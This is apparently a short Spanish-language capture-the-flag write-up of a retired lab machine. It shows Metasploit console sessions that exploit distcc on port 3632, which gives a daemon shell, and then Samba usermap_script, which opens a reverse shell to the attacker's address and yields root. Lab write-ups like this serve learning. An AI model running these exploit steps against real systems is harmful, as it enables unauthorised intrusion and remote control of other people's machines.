Segunda box de hoy, estoy en fucking fire, pero bueno, están muy fáciles, supongo que es porque son viejas.

Este estuvo más interesante.

primero probe:

Pude encontrar el pasword de ftp, lo que me desvió un poco porque no se podían subir archivos….

Luego intente el puerto raro, 3632:

msf > use exploit/unix/misc/distcc_exec
msf exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(unix/misc/distcc_exec) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(unix/misc/distcc_exec) > set payload windows/meterpreter/reverse_tcp[-] The vmsf emsf exploitmsf expmsmsf exploit(unix/misc/distcc_exec) > set payload windows/meterpreter/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(unix/misc/distcc_exec) > run
whoami
daemon

Eso me hizo el usuario deamon y no pude salir de ahí aunque conseguí la flag del usuario.

Intenté con otro puerto.

msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set payload windows/meterpreter/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.9:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oOF0GxVbxNkIWH4O;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "oOF0GxVbxNkIWH4O\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.9:4444 -> 10.10.10.3:58554) at 2018-05-29 16:18:42 +0100

whoami 
root

y entre directo a root.

Otra vez creo que es sencillo porque son máquinas viejas, pero bueno, vamos subiendo el nivel.